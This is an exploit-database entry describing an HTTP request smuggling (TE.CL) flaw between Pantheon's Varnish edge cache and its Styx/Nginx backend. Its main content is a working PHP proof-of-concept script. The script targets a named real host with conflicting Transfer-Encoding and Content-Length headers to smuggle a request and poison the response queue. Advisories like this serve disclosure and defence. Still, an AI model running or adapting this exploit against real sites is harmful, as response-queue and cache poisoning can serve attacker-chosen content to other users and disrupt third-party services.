Vulners
Lucene search
📄 Varnish / Styx HTTP Request Smuggling
=============================================================================================================================================
| # Title : HTTP Request Smuggling (TE.CL) via Edge Cache Misconfiguration (Varnish ↔ Styx) |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.2 (64 bits) |
| # Vendor : https://pantheon.io/ |
=============================================================================================================================================
[+] References :
[+] Summary : A critical HTTP Request Smuggling (TE.CL) vulnerability exists due to inconsistent HTTP request parsing
between the Pantheon edge caching layer (Varnish) and the backend routing layer (Styx / Nginx).
The edge layer accepts ambiguous requests containing both Content-Length and Transfer-Encoding,
while the backend correctly prioritizes Transfer-Encoding: chunked.
This discrepancy allows an attacker to smuggle arbitrary HTTP requests, resulting in response queue poisoning and potential web cache poisoning.
[+] Technical Details :
Frontend (Varnish Edge Cache)
Parses requests using Content-Length
Does not reject dual-header ambiguity (CL + TE)
Backend (Pantheon Styx / Nginx)
[+] Prioritizes Transfer-Encoding: chunked
Leaves smuggled payload queued for the next request
[+] Vulnerability Class :
Desynchronization → Response Queue Poisoning → Cache Poisoning
[+] Proof of Concept (PoC)
The following PoC demonstrates request smuggling by injecting a benign smuggled request and observing its response being returned for a subsequent legitimate request.
[+] PoC : poc_final.php
<?php
/**
* Proof of Concept: HTTP Request Smuggling (TE.CL)
* Target: Pantheon-hosted application
*/
error_reporting(E_ALL);
$host = "www.bugcrowd.com"; // Pantheon-hosted example
$asset = "/etc/designs/bugcrowd/clientlibs/main.js";
$poc_mark = "PANTHEON_TECL_POC_" . rand(100, 999);
$fp = fsockopen("ssl://$host", 443, $errno, $errstr, 15);
if (!$fp) die("[-] Connection Failed: $errstr");
// Smuggled request
$smuggled = "GET /nonexistent-$poc_mark HTTP/1.1\r\n";
$smuggled .= "Host: $host\r\n";
$smuggled .= "Connection: keep-alive\r\n\r\n";
// Main TE.CL request
$body = "0\r\n\r\n" . $smuggled;
$request = "POST / HTTP/1.1\r\n";
$request .= "Host: $host\r\n";
$request .= "Transfer-Encoding: chunked\r\n";
$request .= "Content-Length: 4\r\n";
$request .= "Connection: keep-alive\r\n\r\n";
$request .= $body;
fwrite($fp, $request);
usleep(600000);
// Trigger request
fwrite($fp, "GET $asset HTTP/1.1\r\nHost: $host\r\n\r\n");
$response = "";
while (!feof($fp)) {
$response .= fgets($fp, 1024);
}
fclose($fp);
if (strpos($response, $poc_mark) !== false) {
echo "[+] SUCCESS: Response queue poisoned via TE.CL.\n";
}
?>
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
24 Dec 2025 00:00Current
7High risk
Vulners AI Score7